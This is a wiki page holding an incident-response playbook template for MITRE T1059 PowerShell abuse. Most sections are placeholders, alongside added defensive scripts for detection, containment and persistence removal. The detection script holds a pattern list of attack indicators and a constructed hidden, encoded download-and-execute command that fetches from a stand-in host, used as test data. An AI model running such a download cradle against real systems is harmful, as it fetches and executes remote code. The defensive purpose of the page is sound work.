
What to do if you think techniques should be combined into one playbook

Austin Songer edited this page Jul 12, 2021 · 2 revisions

EXAMPLE: Sub-techniques that you think should be folded into the parent technique's playbook

## Playbook: Command and Scripting Interpreter

**Mitigation-Category:** 
  
  
### MITRE

| Tactic    | Technique ID | Technique Name                    | Sub-Technique Name      | Platforms | Permissions Required |
| --------- | ------------ | --------------------------------- | ----------------------- | --------- | -------------------- |
| Execution | T1059        | Command and Scripting Interpreter | PowerShell (T1059.001)  | Windows   | User, Administrator  |



### Preparation

Assign steps to individuals or teams to work concurrently, when possible; this playbook is not purely sequential. Use your best judgment.

--------------

### Investigate

`TODO: Expand investigation steps, including key questions and strategies, for <Type of Incident>.`


> Sub-technique Playbook: `T1059.001 - PowerShell`
> 
> `TODO: Expand investigation steps, including key questions and strategies, for <Type of Incident>.`
> 
> 
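
The following is an added example for the PowerShell sub-technique and is not part of this playbook template or the repository's own material. It shows one concrete investigation step: pull script block logging events (Event ID 4104 in the `Microsoft-Windows-PowerShell/Operational` log, which only exist if script block logging is enabled) from the suspect host, decode any `-EncodedCommand` payload, and flag common indicators. The function names, the indicator list and the sample command line at the end are constructed for illustration; the log name, event ID and property layout are the standard Windows ones. Tune the indicator list to your environment before relying on it.

```powershell
# Added example (not from the original playbook). Function names, the indicator
# list and the sample command line below are constructed illustrations; the log
# name, event ID and property layout are the standard Windows ones.

# Indicators commonly seen in malicious PowerShell: download cradles, in-memory
# execution, encoded commands, hidden windows and AMSI tampering.
$SuspiciousPatterns = @(
    'DownloadString', 'DownloadFile', 'Invoke-Expression', '\bIEX\b',
    'Net\.WebClient', 'Invoke-WebRequest', 'FromBase64String', 'Reflection\.Assembly',
    'AmsiUtils', 'amsiInitFailed', '-NoProfile', '-WindowStyle\s+Hidden',
    '-ExecutionPolicy\s+Bypass', '-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}'
)

# Recover the UTF-16LE script behind -EncodedCommand (also written -enc / -e).
function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    $m = [regex]::Match($CommandLine, '(?i)(?:^|\s)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})')
    if (-not $m.Success) { return $null }
    try   { [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value)) }
    catch { $null }
}

# Match a script block or command line (plus its decoded payload) against the list.
function Test-SuspiciousPowerShell {
    param([Parameter(Mandatory)][string]$Text)
    $decoded = ConvertFrom-EncodedCommand -CommandLine $Text
    $corpus  = if ($decoded) { "$Text`n$decoded" } else { $Text }
    $hits    = @($SuspiciousPatterns | Where-Object { $corpus -match "(?i)$_" })
    [pscustomobject]@{ Score = $hits.Count; Hits = $hits; Decoded = $decoded }
}

# Pull 4104 script block events from the suspect host and keep the ones that score.
# Run locally, or inside Enter-PSSession / Invoke-Command against the host.
function Get-SuspiciousScriptBlock {
    param([datetime]$Since = (Get-Date).AddDays(-1))
    Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = $Since
    } | ForEach-Object {
        $text = [string]$_.Properties[2].Value        # ScriptBlockText
        $r = Test-SuspiciousPowerShell -Text $text
        if ($r.Score -gt 0) {
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                Hits        = $r.Hits -join ', '
                Snippet     = $text.Substring(0, [Math]::Min(200, $text.Length))
            }
        }
    } | Sort-Object TimeCreated
}

# Constructed sample (not real telemetry) so the scoring can be exercised offline.
$payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
$sample  = 'powershell.exe -NoProfile -WindowStyle Hidden -enc ' +
           [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
Test-SuspiciousPowerShell -Text $sample | Format-List
```

Key questions this supports: which user and parent process ran the block (join the 4104 `TimeCreated` to Security 4688 or Sysmon 1 on the same host), whether the decoded payload reaches out to the network (pivot to proxy or DNS logs on the hostname), and whether the same script block ID appears on other hosts. Note that 4104 only records what was executed after logging was enabled; if the host was not logging, fall back to `-EncodedCommand` strings in process-creation telemetry.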


--------------

### Remediate

* **Plan remediation events** where these steps are launched together (or in coordinated fashion), with appropriate teams ready to respond to any disruption.
* **Consider the timing and tradeoffs** of remediation actions: your response has consequences.



#### Contain

`TODO: Customize containment steps, tactical and strategic, for <Type of Incident>.`
`TODO: Specify tools and procedures for each step, below.`
`TODO: Consider automating containment measures using orchestration tools.`

> Sub-technique Playbook: `T1059.001 - PowerShell`
> 
> `TODO: Customize containment steps, tactical and strategic, for <Type of Incident>.`
> `TODO: Specify tools and procedures for each step, below.`
> `TODO: Consider automating containment measures using orchestration tools.`
> 
> 
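
As an added example for the PowerShell sub-technique (not part of this playbook template), here is tactical containment on a single host: list running PowerShell processes with their parent and owner, flag the ones spawned by Office applications or script hosts, stop them on request, and switch on script block logging, module logging and transcription so that anything which re-spawns is captured in full. The parent-process list and the function names are constructed for illustration; the registry values are the standard PowerShell policy keys. Run it elevated on the suspect host.

```powershell
# Added example (not from the original playbook). The parent list and function
# names are constructed illustrations; the registry keys are the standard
# PowerShell policy keys. Run elevated on the suspect host.

# Parents that should rarely spawn an interpreter: Office apps and script hosts.
$SuspiciousParents = @('winword.exe','excel.exe','powerpnt.exe','outlook.exe',
                       'mshta.exe','wscript.exe','cscript.exe','rundll32.exe','regsvr32.exe')
$PowerShellHosts   = @('powershell.exe','pwsh.exe','powershell_ise.exe')

# One row per PowerShell process with its parent, owner and full command line.
function Get-PowerShellProcessTree {
    $all  = Get-CimInstance Win32_Process
    $byId = @{}
    foreach ($p in $all) { $byId[[int]$p.ProcessId] = $p }
    foreach ($p in $all) {
        if ($p.Name -notin $PowerShellHosts) { continue }
        $parent = $byId[[int]$p.ParentProcessId]
        $owner  = Invoke-CimMethod -InputObject $p -MethodName GetOwner -ErrorAction SilentlyContinue
        [pscustomobject]@{
            ProcessId   = $p.ProcessId
            ParentName  = if ($parent) { $parent.Name } else { '<exited>' }
            Owner       = if ($owner.User) { "$($owner.Domain)\$($owner.User)" } else { '?' }
            CommandLine = $p.CommandLine
            Flagged     = [bool]($parent -and $parent.Name -in $SuspiciousParents)
        }
    }
}

# Kill flagged interpreters. Defaults to -WhatIf so the responder sees the plan first.
function Stop-FlaggedPowerShell {
    param([switch]$Execute)
    Get-PowerShellProcessTree | Where-Object Flagged | ForEach-Object {
        Stop-Process -Id $_.ProcessId -Force -WhatIf:(-not $Execute)
    }
}

# Make sure any re-spawn is logged in full: Event ID 4104 plus a transcript on disk.
function Enable-PowerShellLogging {
    param([string]$TranscriptDir = 'C:\PSTranscripts')
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    foreach ($sub in 'ScriptBlockLogging','ModuleLogging','ModuleLogging\ModuleNames','Transcription') {
        New-Item -Path "$base\$sub" -Force | Out-Null
    }
    Set-ItemProperty "$base\ScriptBlockLogging"       EnableScriptBlockLogging 1 -Type DWord
    Set-ItemProperty "$base\ModuleLogging"            EnableModuleLogging      1 -Type DWord
    Set-ItemProperty "$base\ModuleLogging\ModuleNames" '*' '*' -Type String
    Set-ItemProperty "$base\Transcription"            EnableTranscripting      1 -Type DWord
    Set-ItemProperty "$base\Transcription"            EnableInvocationHeader   1 -Type DWord
    Set-ItemProperty "$base\Transcription"            OutputDirectory $TranscriptDir -Type String
}

Get-PowerShellProcessTree | Format-Table -AutoSize
Stop-FlaggedPowerShell            # review the -WhatIf output, then: Stop-FlaggedPowerShell -Execute
Enable-PowerShellLogging
```

Killing the interpreter stops the current payload but not whatever launched it; pair this with network isolation of the host and with the persistence hunt in the Eradicate step, and note that `Get-CimInstance Win32_Process` does not see the command line of processes the responder's account cannot open, so run it elevated.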

#### Eradicate

`TODO: Customize eradication steps, tactical and strategic, for <Type of Incident>.`

`TODO: Specify tools and procedures for each step, below.`

> Sub-technique Playbook: `T1059.001 - PowerShell`
> 
> `TODO: Customize eradication steps, tactical and strategic, for <Type of Incident>.`
> `TODO: Specify tools and procedures for each step, below.`
> 
> 
> 
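
An added example for the PowerShell sub-technique (not part of this playbook template): an eradication hunt for the places a PowerShell payload is commonly re-launched from, namely Run/RunOnce keys, scheduled task actions, permanent WMI event subscriptions and PowerShell profile scripts. Each finding carries its own removal scriptblock so the responder can review the list first and remove only what is confirmed malicious. The function names and the indicator regex are constructed for illustration; the registry paths, task cmdlets and WMI classes are standard. Run it elevated.

```powershell
# Added example (not from the original playbook). Function names and the
# indicator regex are constructed illustrations; the registry paths, task
# cmdlets and WMI classes are standard. Run elevated; review before removing.

$RunKeys = @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
             'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
             'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
             'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce')
$Needle  = '(?i)powershell|pwsh|-enc|FromBase64String|DownloadString|Invoke-Expression'

function New-Finding($Kind, $Location, $Detail, [scriptblock]$Remove) {
    [pscustomobject]@{ Kind = $Kind; Location = $Location; Detail = $Detail; Remove = $Remove }
}

# Every finding carries a removal scriptblock (closed over the loop variables)
# so eradication stays reviewable: list first, execute per finding afterwards.
function Find-PowerShellPersistence {
    # Run / RunOnce values
    foreach ($k in $RunKeys) {
        if (-not (Test-Path $k)) { continue }
        $props = Get-ItemProperty -Path $k
        foreach ($n in $props.PSObject.Properties.Name) {
            if ($n -like 'PS*') { continue }                      # provider metadata, not values
            $v = [string]$props.$n
            if ($v -match $Needle) {
                New-Finding 'RunKey' "$k\$n" $v ({ Remove-ItemProperty -Path $k -Name $n }.GetNewClosure())
            }
        }
    }
    # Scheduled tasks whose action launches PowerShell
    foreach ($t in Get-ScheduledTask) {
        foreach ($a in $t.Actions) {
            $cmd = "$($a.Execute) $($a.Arguments)"
            if ($cmd -match $Needle) {
                New-Finding 'ScheduledTask' "$($t.TaskPath)$($t.TaskName)" $cmd ({
                    Unregister-ScheduledTask -TaskName $t.TaskName -TaskPath $t.TaskPath -Confirm:$false
                }.GetNewClosure())
            }
        }
    }
    # Permanent WMI subscriptions with a command-line consumer. The binding and
    # its filter must go too, or the subscription is only half removed.
    $ns = 'root/subscription'
    foreach ($c in Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue) {
        $cmd = "$($c.ExecutablePath) $($c.CommandLineTemplate)"
        if ($cmd -match $Needle) {
            New-Finding 'WmiSubscription' $c.Name $cmd ({
                $bindings = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding |
                            Where-Object { $_.Consumer.Name -eq $c.Name }   # Consumer/Filter are object references
                foreach ($b in $bindings) {
                    Get-CimInstance -Namespace $ns -ClassName __EventFilter |
                        Where-Object Name -eq $b.Filter.Name | Remove-CimInstance
                    $b | Remove-CimInstance
                }
                $c | Remove-CimInstance
            }.GetNewClosure())
        }
    }
    # Profile scripts run on every interactive start; a planted one is persistence.
    foreach ($f in @($PROFILE.AllUsersAllHosts, $PROFILE.CurrentUserAllHosts)) {
        if ($f -and (Test-Path $f) -and ((Get-Content $f -Raw) -match $Needle)) {
            New-Finding 'Profile' $f (Get-Content $f -Raw) ({ Remove-Item -Path $f -Force }.GetNewClosure())
        }
    }
}

# Review, then remove only the findings confirmed malicious, e.g.:
#   foreach ($f in $findings | Where-Object Kind -eq 'ScheduledTask') { & $f.Remove }
$findings = @(Find-PowerShellPersistence)
$findings | Format-Table Kind, Location, Detail -AutoSize
```

The hunt is deliberately narrow: it covers the locations this sub-technique most often abuses, not every autostart on Windows. Capture the findings (and the referenced script files) as evidence before running any `Remove` block, and expect the same persistence on other hosts the same account touched.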

#### Reference: Remediation Resources

`TODO: Specify financial, personnel, and logistical resources to accomplish remediation.`

--------------

### Communicate

`TODO: Customize communication steps for <Type of Incident>`

`TODO: Specify tools and procedures (including who must be involved) for each step, below, or refer to overall plan.`

In addition to the general steps and guidance in the incident response plan:


   

--------------

### Recover

`TODO: Customize recovery steps for <Type of Incident>.`

`TODO: Specify tools and procedures for each step, below.`

In addition to the general steps and guidance in the incident response plan:


--------------
  
### Lessons Learned

`TODO: Add items that will occur post-recovery.`
  
1.    Perform routine cyber hygiene due diligence
2.    Engage external cybersecurity-as-a-service providers and response professionals
 

--------------

### Resources

#### Additional Information

1. <a name="command-and-scripting-interpreter-playbook-ref-1"></a>["Title"](#TODO-url), Author Last Name (Date)